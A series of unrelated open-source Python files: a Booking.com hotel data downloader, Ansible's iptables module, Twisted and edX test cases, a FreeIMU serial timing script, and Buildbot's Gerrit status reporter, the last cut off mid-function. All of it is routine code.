location = hotel_data["location"]
row = (
hotel["hotel_id"],
f"{location['latitude']:.6f}",
f"{location['longitude']:.6f}",
hotel_data["name"],
hotel_data["address"],
hotel_data["class"],
self._get_rate(hotel),
hotel_data["ranking"],
hotel_data["review_score"],
hotel_data["url"],
hotel_data["hotel_type_id"],
self._get_translations(hotel)
)
return sep.join(BookingGen._format_string(str(x)) for x in row)
def download_hotels_by_country(api, country):
generator = BookingGen(api, country)
rows = list(generator.generate_tsv_rows())
logging.info(f"For {country['name']} {len(rows)} lines were generated.")
return rows
def download(country_code, user, password, path, threads_count,
progress_bar=tqdm(disable=True)):
api = BookingApi(user, password, "2.4")
list_api = BookingListApi(api)
countries = list_api.countries(languages="en")
if country_code is not None:
countries = list(filter(lambda x: x["country"] in country_code, countries))
logging.info(f"There is {len(countries)} countries.")
progress_bar.desc = "Countries"
progress_bar.total = len(countries)
with open(path, "w") as f:
with ThreadPool(threads_count) as pool:
for lines in pool.imap_unordered(partial(download_hotels_by_country, list_api),
countries):
f.writelines([f"{x}\n" for x in lines])
progress_bar.update()
logging.info(f"Hotels were saved to {path}.")
def process_options():
parser = argparse.ArgumentParser(description="Download and process booking hotels.")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("--logfile", default="",
help="Name and destination for log file")
parser.add_argument("--password", required=True, dest="password",
help="Booking.com account password")
parser.add_argument("--user", required=True, dest="user",
help="Booking.com account user name")
parser.add_argument("--threads_count", default=1, type=int,
help="The number of threads for processing countries.")
parser.add_argument("--output", required=True, dest="output",
help="Name and destination for output file")
parser.add_argument("--country_code", default=None, action="append",
help="Download hotels of this country.")
options = parser.parse_args()
return options
def main():
options = process_options()
logfile = ""
if options.logfile:
logfile = options.logfile
else:
now = datetime.datetime.now()
name = f"{now.strftime('%d_%m_%Y-%H_%M_%S')}_booking_hotels.log"
logfile = os.path.join(os.path.dirname(os.path.realpath(__file__)), name)
print(f"Logs saved to {logfile}.", file=sys.stdout)
if options.threads_count > 1:
print(f"Limit requests per minute is {LIMIT_REQUESTS_PER_MINUTE}.", file=sys.stdout)
logging.basicConfig(level=logging.DEBUG, filename=logfile,
format="%(thread)d [%(asctime)s] %(levelname)s: %(message)s")
with tqdm(disable=not options.verbose) as progress_bar:
download(options.country_code, options.user, options.password,
options.output, options.threads_count, progress_bar)
if __name__ == "__main__":
main()
|
mavit/ansible-modules-extras
|
refs/heads/devel
|
system/iptables.py
|
12
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, Linus Unnebäck <linus@folkdatorn.se>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
BINS = dict(
ipv4='iptables',
ipv6='ip6tables',
)
DOCUMENTATION = '''
---
module: iptables
short_description: Modify the systems iptables
requirements: []
version_added: "2.0"
author: Linus Unnebäck (@LinusU) <linus@folkdatorn.se>
description:
- Iptables is used to set up, maintain, and inspect the tables of IP packet
filter rules in the Linux kernel. This module does not handle the saving
and/or loading of rules, but rather only manipulates the current rules
that are present in memory. This is the same as the behaviour of the
"iptables" and "ip6tables" command which this module uses internally.
notes:
- This module just deals with individual rules. If you need advanced
chaining of rules the recommended way is to template the iptables restore
file.
options:
table:
description:
- This option specifies the packet matching table which the command
should operate on. If the kernel is configured with automatic module
loading, an attempt will be made to load the appropriate module for
that table if it is not already there.
required: false
default: filter
choices: [ "filter", "nat", "mangle", "raw", "security" ]
state:
description:
- Whether the rule should be absent or present.
required: false
default: present
choices: [ "present", "absent" ]
ip_version:
description:
- Which version of the IP protocol this rule should apply to.
required: false
default: ipv4
choices: [ "ipv4", "ipv6" ]
chain:
description:
- "Chain to operate on. This option can either be the name of a user
defined chain or any of the builtin chains: 'INPUT', 'FORWARD',
'OUTPUT', 'PREROUTING', 'POSTROUTING', 'SECMARK', 'CONNSECMARK'"
required: true
protocol:
description:
- The protocol of the rule or of the packet to check. The specified
protocol can be one of tcp, udp, udplite, icmp, esp, ah, sctp or the
special keyword "all", or it can be a numeric value, representing one
of these protocols or a different one. A protocol name from
/etc/protocols is also allowed. A "!" argument before the protocol
inverts the test. The number zero is equivalent to all. "all" will
match with all protocols and is taken as default when this option is
omitted.
required: false
default: null
source:
description:
- Source specification. Address can be either a network name,
a hostname, a network IP address (with /mask), or a plain IP address.
Hostnames will be resolved once only, before the rule is submitted to
the kernel. Please note that specifying any name to be resolved with
a remote query such as DNS is a really bad idea. The mask can be
either a network mask or a plain number, specifying the number of 1's
at the left side of the network mask. Thus, a mask of 24 is equivalent
to 255.255.255.0. A "!" argument before the address specification
inverts the sense of the address.
required: false
default: null
destination:
description:
- Destination specification. Address can be either a network name,
a hostname, a network IP address (with /mask), or a plain IP address.
Hostnames will be resolved once only, before the rule is submitted to
the kernel. Please note that specifying any name to be resolved with
a remote query such as DNS is a really bad idea. The mask can be
either a network mask or a plain number, specifying the number of 1's
at the left side of the network mask. Thus, a mask of 24 is equivalent
to 255.255.255.0. A "!" argument before the address specification
inverts the sense of the address.
required: false
default: null
match:
description:
- Specifies a match to use, that is, an extension module that tests for
a specific property. The set of matches make up the condition under
which a target is invoked. Matches are evaluated first to last if
specified as an array and work in short-circuit fashion, i.e. if one
extension yields false, evaluation will stop.
required: false
default: []
jump:
description:
- This specifies the target of the rule; i.e., what to do if the packet
matches it. The target can be a user-defined chain (other than the one
this rule is in), one of the special builtin targets which decide the
fate of the packet immediately, or an extension (see EXTENSIONS
below). If this option is omitted in a rule (and the goto parameter
is not used), then matching the rule will have no effect on the
packet's fate, but the counters on the rule will be incremented.
required: false
default: null
goto:
description:
- This specifies that the processing should continue in a user specified
chain. Unlike the jump argument return will not continue processing in
this chain but instead in the chain that called us via jump.
required: false
default: null
in_interface:
description:
- Name of an interface via which a packet was received (only for packets
entering the INPUT, FORWARD and PREROUTING chains). When the "!"
argument is used before the interface name, the sense is inverted. If
the interface name ends in a "+", then any interface which begins with
this name will match. If this option is omitted, any interface name
will match.
required: false
default: null
out_interface:
description:
- Name of an interface via which a packet is going to be sent (for
packets entering the FORWARD, OUTPUT and POSTROUTING chains). When the
"!" argument is used before the interface name, the sense is inverted.
If the interface name ends in a "+", then any interface which begins
with this name will match. If this option is omitted, any interface
name will match.
required: false
default: null
fragment:
description:
- This means that the rule only refers to second and further fragments
of fragmented packets. Since there is no way to tell the source or
destination ports of such a packet (or ICMP type), such a packet will
not match any rules which specify them. When the "!" argument precedes
fragment argument, the rule will only match head fragments, or
unfragmented packets.
required: false
default: null
set_counters:
description:
- This enables the administrator to initialize the packet and byte
counters of a rule (during INSERT, APPEND, REPLACE operations).
required: false
default: null
source_port:
description:
- "Source port or port range specification. This can either be a service
name or a port number. An inclusive range can also be specified, using
the format first:last. If the first port is omitted, '0' is assumed;
if the last is omitted, '65535' is assumed. If the first port is
greater than the second one they will be swapped."
required: false
default: null
destination_port:
description:
- "Destination port or port range specification. This can either be
a service name or a port number. An inclusive range can also be
specified, using the format first:last. If the first port is omitted,
'0' is assumed; if the last is omitted, '65535' is assumed. If the
first port is greater than the second one they will be swapped."
required: false
default: null
to_ports:
description:
- "This specifies a destination port or range of ports to use: without
this, the destination port is never altered. This is only valid if the
rule also specifies one of the following protocols: tcp, udp, dccp or
sctp."
required: false
default: null
to_destination:
version_added: "2.1"
description:
- "This specifies a destination address to use with DNAT: without
this, the destination address is never altered."
required: false
default: null
set_dscp_mark:
version_added: "2.1"
description:
- "This allows specifying a DSCP mark to be added to packets.
It takes either an integer or hex value. Mutually exclusive with
C(set_dscp_mark_class)."
required: false
default: null
set_dscp_mark_class:
version_added: "2.1"
description:
- "This allows specifying a predefined DiffServ class which will be
translated to the corresponding DSCP mark. Mutually exclusive with
C(set_dscp_mark)."
required: false
default: null
comment:
description:
- "This specifies a comment that will be added to the rule"
required: false
default: null
ctstate:
description:
- "ctstate is a list of the connection states to match in the conntrack module.
Possible states are: 'INVALID', 'NEW', 'ESTABLISHED', 'RELATED', 'UNTRACKED', 'SNAT', 'DNAT'"
required: false
default: []
limit:
description:
- "Specifies the maximum average number of matches to allow per second. The number can specify units explicitly, using `/second', `/minute', `/hour' or `/day', or parts of them (so `5/second' is the same as `5/s')."
required: false
default: null
limit_burst:
version_added: "2.1"
description:
- "Specifies the maximum burst before the above limit kicks in."
required: false
default: null
uid_owner:
version_added: "2.1"
description:
- "Specifies the UID or username to use in match by owner rule."
required: false
reject_with:
version_added: "2.1"
description:
- "Specifies the error packet type to return while rejecting."
required: false
'''
EXAMPLES = '''
# Block specific IP
- iptables: chain=INPUT source=8.8.8.8 jump=DROP
become: yes
# Forward port 80 to 8600
- iptables: table=nat chain=PREROUTING in_interface=eth0 protocol=tcp match=tcp destination_port=80 jump=REDIRECT to_ports=8600 comment="Redirect web traffic to port 8600"
become: yes
# Allow related and established connections
- iptables: chain=INPUT ctstate=ESTABLISHED,RELATED jump=ACCEPT
become: yes
# Tag all outbound tcp packets with DSCP mark 8
- iptables: chain=OUTPUT jump=DSCP table=mangle set_dscp_mark=8 protocol=tcp
# Tag all outbound tcp packets with DSCP DiffServ class CS1
- iptables: chain=OUTPUT jump=DSCP table=mangle set_dscp_mark_class=CS1 protocol=tcp
'''
def append_param(rule, param, flag, is_list):
if is_list:
for item in param:
append_param(rule, item, flag, False)
else:
if param is not None:
rule.extend([flag, param])
def append_csv(rule, param, flag):
if param:
rule.extend([flag, ','.join(param)])
def append_match(rule, param, match):
if param:
rule.extend(['-m', match])
def append_jump(rule, param, jump):
if param:
rule.extend(['-j', jump])
def construct_rule(params):
rule = []
append_param(rule, params['protocol'], '-p', False)
append_param(rule, params['source'], '-s', False)
append_param(rule, params['destination'], '-d', False)
append_param(rule, params['match'], '-m', True)
append_param(rule, params['jump'], '-j', False)
append_param(rule, params['to_destination'], '--to-destination', False)
append_param(rule, params['goto'], '-g', False)
append_param(rule, params['in_interface'], '-i', False)
append_param(rule, params['out_interface'], '-o', False)
append_param(rule, params['fragment'], '-f', False)
append_param(rule, params['set_counters'], '-c', False)
append_param(rule, params['source_port'], '--source-port', False)
append_param(rule, params['destination_port'], '--destination-port', False)
append_param(rule, params['to_ports'], '--to-ports', False)
append_param(rule, params['set_dscp_mark'], '--set-dscp', False)
append_param(rule, params['set_dscp_mark_class'], '--set-dscp-class', False)
append_match(rule, params['comment'], 'comment')
append_param(rule, params['comment'], '--comment', False)
append_match(rule, params['ctstate'], 'state')
append_csv(rule, params['ctstate'], '--state')
append_match(rule, params['limit'] or params['limit_burst'], 'limit')
append_param(rule, params['limit'], '--limit', False)
append_param(rule, params['limit_burst'], '--limit-burst', False)
append_match(rule, params['uid_owner'], 'owner')
append_param(rule, params['uid_owner'], '--uid-owner', False)
append_jump(rule, params['reject_with'], 'REJECT')
append_param(rule, params['reject_with'], '--reject-with', False)
return rule
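# Illustrative mapping (not executed): a params dict with protocol='tcp',
# jump='ACCEPT', ctstate=['ESTABLISHED', 'RELATED'] and every other option
# left at its default yields
#   ['-p', 'tcp', '-j', 'ACCEPT', '-m', 'state', '--state', 'ESTABLISHED,RELATED']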
def push_arguments(iptables_path, action, params):
cmd = [iptables_path]
cmd.extend(['-t', params['table']])
cmd.extend([action, params['chain']])
cmd.extend(construct_rule(params))
return cmd
def check_present(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-C', params)
rc, _, __ = module.run_command(cmd, check_rc=False)
return (rc == 0)
def append_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-A', params)
module.run_command(cmd, check_rc=True)
def remove_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-D', params)
module.run_command(cmd, check_rc=True)
def main():
module = AnsibleModule(
supports_check_mode=True,
argument_spec=dict(
table=dict(required=False, default='filter', choices=['filter', 'nat', 'mangle', 'raw', 'security']),
state=dict(required=False, default='present', choices=['present', 'absent']),
ip_version=dict(required=False, default='ipv4', choices=['ipv4', 'ipv6']),
chain=dict(required=True, default=None, type='str'),
protocol=dict(required=False, default=None, type='str'),
source=dict(required=False, default=None, type='str'),
destination=dict(required=False, default=None, type='str'),
to_destination=dict(required=False, default=None, type='str'),
match=dict(required=False, default=[], type='list'),
jump=dict(required=False, default=None, type='str'),
goto=dict(required=False, default=None, type='str'),
in_interface=dict(required=False, default=None, type='str'),
out_interface=dict(required=False, default=None, type='str'),
fragment=dict(required=False, default=None, type='str'),
set_counters=dict(required=False, default=None, type='str'),
source_port=dict(required=False, default=None, type='str'),
destination_port=dict(required=False, default=None, type='str'),
to_ports=dict(required=False, default=None, type='str'),
set_dscp_mark=dict(required=False,default=None, type='str'),
set_dscp_mark_class=dict(required=False,default=None, type='str'),
comment=dict(required=False, default=None, type='str'),
ctstate=dict(required=False, default=[], type='list'),
limit=dict(required=False, default=None, type='str'),
limit_burst=dict(required=False, default=None, type='str'),
uid_owner=dict(required=False, default=None, type='str'),
reject_with=dict(required=False, default=None, type='str'),
),
mutually_exclusive=(
['set_dscp_mark', 'set_dscp_mark_class'],
),
)
args = dict(
changed=False,
failed=False,
ip_version=module.params['ip_version'],
table=module.params['table'],
chain=module.params['chain'],
rule=' '.join(construct_rule(module.params)),
state=module.params['state'],
)
ip_version = module.params['ip_version']
iptables_path = module.get_bin_path(BINS[ip_version], True)
rule_is_present = check_present(iptables_path, module, module.params)
should_be_present = (args['state'] == 'present')
# Check if target is up to date
args['changed'] = (rule_is_present != should_be_present)
# Check only; don't modify
if module.check_mode:
module.exit_json(changed=args['changed'])
# Target is already up to date
if not args['changed']:
module.exit_json(**args)
if should_be_present:
append_rule(iptables_path, module, module.params)
else:
remove_rule(iptables_path, module, module.params)
module.exit_json(**args)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
louietsai/python-for-android
|
refs/heads/master
|
python-modules/twisted/twisted/internet/test/inlinecb_tests.py
|
59
|
# -*- test-case-name: twisted.internet.test.test_inlinecb -*-
# Copyright (c) 2009-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.internet.defer.inlineCallbacks}.
These tests are defined in a non-C{test_*} module because they are
syntactically invalid on python < 2.5. test_inlinecb will conditionally import
these tests on python 2.5 and greater.
Some tests for inlineCallbacks are defined in L{twisted.test.test_defgen} as
well: see U{http://twistedmatrix.com/trac/ticket/4182}.
"""
from twisted.trial.unittest import TestCase
from twisted.internet.defer import Deferred, returnValue, inlineCallbacks
class NonLocalExitTests(TestCase):
"""
It's possible for L{returnValue} to be (accidentally) invoked at a stack
level below the L{inlineCallbacks}-decorated function which it is exiting.
If this happens, L{returnValue} should report useful errors.
If L{returnValue} is invoked from a function not decorated by
L{inlineCallbacks}, it will emit a warning if it causes an
L{inlineCallbacks} function further up the stack to exit.
"""
def mistakenMethod(self):
"""
This method mistakenly invokes L{returnValue}, despite the fact that it
is not decorated with L{inlineCallbacks}.
"""
returnValue(1)
def assertMistakenMethodWarning(self, resultList):
"""
Flush the current warnings and assert that we have been told that
C{mistakenMethod} was invoked, and that the result from the Deferred
that was fired (appended to the given list) is C{mistakenMethod}'s
result. The warning should indicate that an inlineCallbacks function
called 'inline' was made to exit.
"""
self.assertEqual(resultList, [1])
warnings = self.flushWarnings(offendingFunctions=[self.mistakenMethod])
self.assertEqual(len(warnings), 1)
self.assertEquals(warnings[0]['category'], DeprecationWarning)
self.assertEquals(
warnings[0]['message'],
"returnValue() in 'mistakenMethod' causing 'inline' to exit: "
"returnValue should only be invoked by functions decorated with "
"inlineCallbacks")
def test_returnValueNonLocalWarning(self):
"""
L{returnValue} will emit a non-local exit warning in the simplest case,
where the offending function is invoked immediately.
"""
@inlineCallbacks
def inline():
self.mistakenMethod()
returnValue(2)
yield 0
d = inline()
results = []
d.addCallback(results.append)
self.assertMistakenMethodWarning(results)
def test_returnValueNonLocalDeferred(self):
"""
L{returnValue} will emit a non-local warning in the case where the
L{inlineCallbacks}-decorated function has already yielded a Deferred
and therefore moved its generator function along.
"""
cause = Deferred()
@inlineCallbacks
def inline():
yield cause
self.mistakenMethod()
returnValue(2)
effect = inline()
results = []
effect.addCallback(results.append)
self.assertEquals(results, [])
cause.callback(1)
self.assertMistakenMethodWarning(results)
|
ScifestJoensuu/theater-robot
|
refs/heads/master
|
Arduino/libraries/FreeIMU/debug/timing.py
|
21
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
time.py - Tests the output coming from an Arduino with FreeIMU for speed.
Load the Arduino with the FreeIMU_serial program.
Copyright (C) 2012 Fabio Varesano <fvaresano@yahoo.it>
Development of this code has been supported by the Department of Computer Science,
Universita' degli Studi di Torino, Italy within the Piemonte Project
http://www.piemonte.di.unito.it/
This program is free software: you can redistribute it and/or modify
it under the terms of the version 3 GNU General Public License as
published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import time
import serial
from struct import unpack
from binascii import unhexlify
from subprocess import call
print "\n\nWelcome to the FreeIMU timer routine!\nCopyright © Fabio Varesano 2012.\nReleased under GPL v3 - See http://www.gnu.org/copyleft/gpl.html\n\n"
print "Please load the FreeIMU_serial program from the FreeIMU library examples on your Arduino. Once you correctly installed the FreeIMU library, the examples are available from File->Examples->FreeIMU in the Arduino IDE.\nWhen done, close the Arduino IDE and its serial monitor."
raw_input('Hit Enter to continue.')
arduino_port = raw_input('Insert the serial port which connects to the Arduino (See in the Arduino IDE Tools->Serial Port if in doubt): ')
# instantiate a serial port object. port gets opened by default, no need to explicitly open it.
ser = serial.Serial(
port= arduino_port,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
if ser.isOpen():
print "Arduino serial port opened correctly"
# we rely on the unhandled serial exception which will stop the program in case of problems during serial opening
ser.write('v') # ask version
print "\nFreeIMU library version informations:",
print ser.readline()
print "\nThe program will now start sampling debugging values and timing them.\n"
raw_input('Hit Enter to continue.')
buff = [0.0 for i in range(9)]
start = time.time()
tot_readings = 0
try:
print "Sampling from FreeIMU and timing readings"
while True:
ser.readline()
ser.readline()
ser.readline()
tot_readings = tot_readings + 1
if(tot_readings % 100 == 0):
tot_time = time.time() - start
print "%d readings obtained. Frequency %f over %d seconds. Hit CTRL+C to interrupt." % (tot_readings, tot_readings / tot_time, tot_time)
except KeyboardInterrupt:
ser.close()
|
jonathan-beard/edx-platform
|
refs/heads/master
|
lms/tests.py
|
54
|
"""Tests for the lms module itself."""
import mimetypes
from mock import patch
from django.test import TestCase
from django.core.urlresolvers import reverse
from edxmako import add_lookup, LOOKUP
from lms import startup
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
class LmsModuleTests(TestCase):
"""
Tests for lms module itself.
"""
def test_new_mimetypes(self):
extensions = ['eot', 'otf', 'ttf', 'woff']
for extension in extensions:
mimetype, _ = mimetypes.guess_type('test.' + extension)
self.assertIsNotNone(mimetype)
class TemplateLookupTests(TestCase):
"""
Tests for TemplateLookup.
"""
def test_add_lookup_to_main(self):
"""Test that any template directories added are not cleared when microsites are enabled."""
add_lookup('main', 'external_module', __name__)
directories = LOOKUP['main'].directories
self.assertEqual(len([dir for dir in directories if 'external_module' in dir]), 1)
# This should not clear the directories list
startup.enable_microsites()
directories = LOOKUP['main'].directories
self.assertEqual(len([dir for dir in directories if 'external_module' in dir]), 1)
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_FEEDBACK_SUBMISSION': True})
class HelpModalTests(ModuleStoreTestCase):
"""Tests for the help modal"""
def setUp(self):
super(HelpModalTests, self).setUp()
self.course = CourseFactory.create()
def test_simple_test(self):
"""
Simple test to make sure that you don't get a 500 error when the modal
is enabled.
"""
url = reverse('info', args=[self.course.id.to_deprecated_string()])
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
|
rodrigc/buildbot
|
refs/heads/master
|
master/buildbot/reporters/gerrit.py
|
2
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
"""
Push events to Gerrit
"""
import time
import warnings
from pkg_resources import parse_version
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ProcessProtocol
from twisted.python import log
from buildbot.process.results import EXCEPTION
from buildbot.process.results import FAILURE
from buildbot.process.results import RETRY
from buildbot.process.results import SUCCESS
from buildbot.process.results import WARNINGS
from buildbot.process.results import Results
from buildbot.reporters import utils
from buildbot.util import bytes2unicode
from buildbot.util import service
# Cache the version that the gerrit server is running for this many seconds
GERRIT_VERSION_CACHE_TIMEOUT = 600
GERRIT_LABEL_VERIFIED = 'Verified'
GERRIT_LABEL_REVIEWED = 'Code-Review'
def makeReviewResult(message, *labels):
"""
helper to produce a review result
"""
return dict(message=message, labels=dict(labels))
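# Illustrative example:
#   makeReviewResult("Build succeeded", (GERRIT_LABEL_VERIFIED, 1))
#   -> {'message': 'Build succeeded', 'labels': {'Verified': 1}}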
def _handleLegacyResult(result):
"""
make sure the result is backward compatible
"""
if not isinstance(result, dict):
warnings.warn('The Gerrit status callback uses the old way to '
'communicate results. The outcome might be not what is '
'expected.')
message, verified, reviewed = result
result = makeReviewResult(message,
(GERRIT_LABEL_VERIFIED, verified),
(GERRIT_LABEL_REVIEWED, reviewed))
return result
def _old_add_label(label, value):
if label == GERRIT_LABEL_VERIFIED:
return ["--verified %d" % int(value)]
elif label == GERRIT_LABEL_REVIEWED:
return ["--code-review %d" % int(value)]
warnings.warn(('Gerrit older than 2.6 does not support custom labels. '
'Setting {} is ignored.').format(label))
return []
def _new_add_label(label, value):
return ["--label {}={}".format(label, int(value))]
def defaultReviewCB(builderName, build, result, master, arg):
if result == RETRY:
return makeReviewResult(None)
message = "Buildbot finished compiling your patchset\n"
message += "on configuration: {}\n".format(builderName)
message += "The result is: {}\n".format(Results[result].upper())
return makeReviewResult(message,
(GERRIT_LABEL_VERIFIED, result == SUCCESS or -1))
def defaultSummaryCB(buildInfoList, results, master, arg):
success = False
failure = False
msgs = []
for buildInfo in buildInfoList:
msg = "Builder %(name)s %(resultText)s (%(text)s)" % buildInfo
link = buildInfo.get('url', None)
if link:
msg += " - " + link
else:
msg += "."
msgs.append(msg)
if buildInfo['result'] == SUCCESS: # pylint: disable=simplifiable-if-statement
success = True
else:
failure = True
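# With at least one build reported, vote Verified +1 only when every build
# succeeded; any failure (or mixed results) yields -1.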
if success and not failure:
verified = 1
else:
verified = -1
return makeReviewResult('\n\n'.join(msgs), (GERRIT_LABEL_VERIFIED, verified))
# These are just sentinel values for GerritStatusPush.__init__ args
class DEFAULT_REVIEW:
pass
class DEFAULT_SUMMARY:
pass
class GerritStatusPush(service.BuildbotService):
"""Event streamer to a gerrit ssh server."""
name = "GerritStatusPush"
gerrit_server = None
gerrit_username = None
gerrit_port = None
gerrit_version_time = None
gerrit_version = None
gerrit_identity_file = None
reviewCB = None
reviewArg = None
startCB = None
startArg = None
summaryCB = None
summaryArg = None
wantSteps = False
wantLogs = False
_gerrit_notify = None
def reconfigService(self, server, username, reviewCB=DEFAULT_REVIEW,
startCB=None, port=29418, reviewArg=None,
startArg=None, summaryCB=DEFAULT_SUMMARY, summaryArg=None,
identity_file=None, builders=None, notify=None,
wantSteps=False, wantLogs=False):
# If neither reviewCB nor summaryCB were specified, default to sending
# out "summary" reviews. But if we were given a reviewCB and only a
# reviewCB, disable the "summary" reviews, so we don't send out both
# by default.
if reviewCB is DEFAULT_REVIEW and summaryCB is DEFAULT_SUMMARY:
reviewCB = None
summaryCB = defaultSummaryCB
if reviewCB is DEFAULT_REVIEW:
reviewCB = None
if summaryCB is DEFAULT_SUMMARY:
summaryCB = None
# Parameters.
self.gerrit_server = server
self.gerrit_username = username
self.gerrit_port = port
self.gerrit_version = None
self.gerrit_version_time = 0
self.gerrit_identity_file = identity_file
self.reviewCB = reviewCB
self.reviewArg = reviewArg
self.startCB = startCB
self.startArg = startArg
self.summaryCB = summaryCB
self.summaryArg = summaryArg
self.builders = builders
self._gerrit_notify = notify
self.wantSteps = wantSteps
self.wantLogs = wantLogs
def _gerritCmd(self, *args):
'''Construct a command as a list of strings suitable for
:func:`subprocess.call`.
'''
if self.gerrit_identity_file is not None:
options = ['-i', self.gerrit_identity_file]
else:
options = []
return ['ssh'] + options + [
'@'.join((self.gerrit_username, self.gerrit_server)),
'-p', str(self.gerrit_port),
'gerrit'
] + list(args)
class VersionPP(ProcessProtocol):
def __init__(self, func):
self.func = func
self.gerrit_version = None
def outReceived(self, data):
vstr = b"gerrit version "
if not data.startswith(vstr):
log.msg(b"Error: Cannot interpret gerrit version info: " + data)
return
vers = data[len(vstr):].strip()
log.msg(b"gerrit version: " + vers)
self.gerrit_version = parse_version(bytes2unicode(vers))
def errReceived(self, data):
log.msg(b"gerriterr: " + data)
def processEnded(self, status_object):
if status_object.value.exitCode:
log.msg("gerrit version status: ERROR:", status_object)
return
if self.gerrit_version:
self.func(self.gerrit_version)
def getCachedVersion(self):
if self.gerrit_version is None:
return None
if time.time() - self.gerrit_version_time > GERRIT_VERSION_CACHE_TIMEOUT:
# cached version has expired
self.gerrit_version = None
return self.gerrit_version
def processVersion(self, gerrit_version, func):
self.gerrit_version = gerrit_version
self.gerrit_version_time = time.time()
func()
def callWithVersion(self, func):
command = self._gerritCmd("version")
def callback(gerrit_version):
return self.processVersion(gerrit_version, func)
self.spawnProcess(self.VersionPP(callback), command[0], command, env=None)
class LocalPP(ProcessProtocol):
def __init__(self, status):
self.status = status
def outReceived(self, data):
log.msg("gerritout:", data)
def errReceived(self, data):
log.msg("gerriterr:", data)
def processEnded(self, status_object):
if status_object.value.exitCode:
log.msg("gerrit status: ERROR:", status_object)
else:
log.msg("gerrit status: OK")
@defer.inlineCallbacks
def startService(self):
yield super().startService()
startConsuming = self.master.mq.startConsuming
self._buildsetCompleteConsumer = yield startConsuming(
self.buildsetComplete,
('buildsets', None, 'complete'))
self._buildCompleteConsumer = yield startConsuming(
self.buildComplete,
('builds', None, 'finished'))
self._buildStartedConsumer = yield startConsuming(
self.buildStarted,
('builds', None, 'new'))
def stopService(self):
self._buildsetCompleteConsumer.stopConsuming()
self._buildCompleteConsumer.stopConsuming()
self._buildStartedConsumer.stopConsuming()
@defer.inlineCallbacks
def _got_event(self, key, msg):
# This function is used only from tests
if key[0] == 'builds':
if key[2] == 'new':
yield self.buildStarted(key, msg)
return
elif key[2] == 'finished':
yield self.buildComplete(key, msg)
return
if key[0] == 'buildsets' and key[2] == 'complete': # pragma: no cover
yield self.buildsetComplete(key, msg)
return
raise Exception('Invalid key for _got_event: {}'.format(key)) # pragma: no cover
@defer.inlineCallbacks
def buildStarted(self, key, build):
if self.startCB is None:
return
yield self.getBuildDetails(build)
if self.isBuildReported(build):
result = yield self.startCB(build['builder']['name'], build, self.startArg)
self.sendCodeReviews(build, result)
@defer.inlineCallbacks
def buildComplete(self, key, build):
if self.reviewCB is None:
return
yield self.getBuildDetails(build)
if self.isBuildReported(build):
result = yield self.reviewCB(build['builder']['name'], build, build['results'],
self.master, self.reviewArg)
result = _handleLegacyResult(result)
self.sendCodeReviews(build, result)
@defer.inlineCallbacks
def getBuildDetails(self, build):
br = yield self.master.data.get(("buildrequests", build['buildrequestid']))
buildset = yield self.master.data.get(("buildsets", br['buildsetid']))
yield utils.getDetailsForBuilds(self.master,
buildset,
[build],
wantProperties=True,
wantSteps=self.wantSteps)
def isBuildReported(self, build):
return self.builders is None or build['builder']['name'] in self.builders
@defer.inlineCallbacks
def buildsetComplete(self, key, msg):
if not self.summaryCB:
return
bsid = msg['bsid']
res = yield utils.getDetailsForBuildset(
self.master, bsid, wantProperties=True,
wantSteps=self.wantSteps, wantLogs=self.wantLogs)
builds = res['builds']
buildset = res['buildset']
self.sendBuildSetSummary(buildset, builds)
@defer.inlineCallbacks
def sendBuildSetSummary(self, buildset, builds):
builds = [build for build in builds if self.isBuildReported(build)]
if builds and self.summaryCB:
def getBuildInfo(build):
result = build['results']
resultText = {
SUCCESS: "succeeded",
FAILURE: "failed",
WARNINGS: "completed with warnings",
EXCEPTION: "encountered an exception",
}.get(result, "completed with unknown result %d" % result)
return {'name': build['builder']['name'],
'result': result,
'resultText': resultText,
'text': build['state_string'],
'url': utils.getURLForBuild(self.master, build['builder']['builderid'],
build['number']),
'build': build
}
buildInfoList = sorted(
[getBuildInfo(build) for build in builds], key=lambda bi: bi['name'])
result = yield self.summaryCB(buildInfoList,
Results[buildset['results']],
self.master,
self.summaryArg)
result = _handleLegacyResult(result)
self.sendCodeReviews(builds[0], result)
def sendCodeReviews(self, build, result):
message = result.get('message', None)
if message is None:
return
def getProperty(build, name):
return build['properties'].get(name, [None])[0]
# Gerrit + Repo
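# "repo_downloads" is expected to hold "<project> <change/patchset>" entries,
# while "repo_downloaded" is a space-separated string of
# "<change/patchset> <revision>" pairs, hence the 2 * len(downloads) check below.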
